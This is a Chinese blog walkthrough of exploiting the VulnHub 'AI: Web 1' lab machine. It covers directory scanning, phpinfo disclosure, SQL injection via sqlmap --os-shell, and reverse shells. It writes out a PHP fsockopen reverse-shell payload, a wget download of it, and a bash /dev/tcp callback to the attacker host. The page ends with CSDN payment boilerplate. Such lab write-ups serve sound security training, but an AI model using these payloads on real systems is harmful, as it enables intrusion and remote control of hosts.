ai-web1.0

vulnhub靶场ai-web 1.0

配置环境 windows11 vmware 17.5 kali

靶机下载地址AI: Web: 1 ~ VulnHub

image-20231114183047625

我选的是这个,然后下载完成后解压,使用VMware选择打开虚拟机点击解压后的文件夹,可以找到对应的文件,然后选择复制此虚拟机,(选移动的话有个bug)

现在开始靶场练习

image-20231114183418652

攻击机:kali ip:192.168.31.131

首先kali使用

arp-scan -l

命令查看所处的主机

image-20231114183927023

可以发现靶机ip为192.168.31.132

尝试访问此地址

image-20231114184131060

这里采用kali自带的dirb url 命令去探测目录

dirb http://192.168.31.132  

image-20231114184449226

找到三个地址

第一个已经访问过了,第三个403,所以先看看第二个

image-20231114184743434

这里顺带说明一下(robots.txt文件是为了遵循爬虫协议,在这里面定义的路径,表示不希望被爬虫爬取)

尝试直接访问,发现都是403,这里再次使用dirb命令探测一下目录

dirb http://192.168.31.132/m3diNf0/

image-20231114185042175

访问一下

image-20231114185119984

phpinfo暴露一些敏感信息,观察此页面

可以得到的信息有:

  • 网站架构 ubuntu apache mysql
  • 绝对路径 /home/www/html/web1x443290o2sdf92213
  • 敏感配置 open_basedir 未完成关闭

再接着对/se3reTdir777/uploads/ 进行dirb

dirb http://192.168.31.132/se3reTdir777/uploads/

没有结果尝试对上一级目录扫描

dirb http://192.168.31.132/se3reTdir777/

image-20231114190515843

扫到一个新的url,访问一下

image-20231114190753463

有时候可能会出现bug,例如mysql无法访问之类的,这里建议关机重启,或者直接删掉,再弄一次

输入1‘,后报错,熟悉的sql注入来了

image-20231114190933015

这里直接上sqlmap,主要sql注入确实没学好

我是采用bp抓post包然后使用sqlmap -r post,txt

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

copy to file

然后使用命令

python sqlmap.py -r "post.txt" --level=3 --dbs

看看能否暴数据库

image-20231114193607645

目前得知的条件有

  • 网站绝对路径
  • 可暴数据库

尝试sqlmap 注入拿shell

python sqlmap.py -r "post.txt" --level=3 --os-shell

image-20231114194355154

这里输入之前的网络根地址,还需要一个可以写入的文件,这里将之前的目录一个个尝试

/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

发现此目录可以写入

image-20231114194719191

输入whoami 和 id 命令查看权限

image-20231114194819608

网站权限,同时也说明具有写入权限

尝试提权

这里采用反弹shell

相关文章反弹Shell的方式和详解_powershell 反弹shell-CSDN博客

首先使用

nc -lvp 8888 #端口号可以自拟

然后再开一个终端创建一个php文件

<?php
$sock=fsockopen("192.168.31.131",8888); //ip地址填写自己攻击机的ip
exec("/bin/sh -i <&3 >&3 2>&3");
?>

并且在终端位置开启vps(服务器)服务,这里使用python搭建

python -m http.server 8848 #端口号随意

image-20231114202250808

image-20231114202412616

image-20231114203306322

wget -S http://192.168.31.131:8848/2.php

使用此命令控制靶机下载刚刚写的1.php文件

image-20231114203249468

bash -i >& /dev/tcp/192.168.31.131/8888 0>&1

image-20231115093119661

2.php


使用此命令控制靶机下载刚刚写的1.php文件

[外链图片转存中...(img-uB2LbfaA-1700204354540)]

bash -i >& /dev/tcp/192.168.31.131/8888 0>&1


[外链图片转存中...(img-ySBeNlyl-1700204354541)]

 
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值